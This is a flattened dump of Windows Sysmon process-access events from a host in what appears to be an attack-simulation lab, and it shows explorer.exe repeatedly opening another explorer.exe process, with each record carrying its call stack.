22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 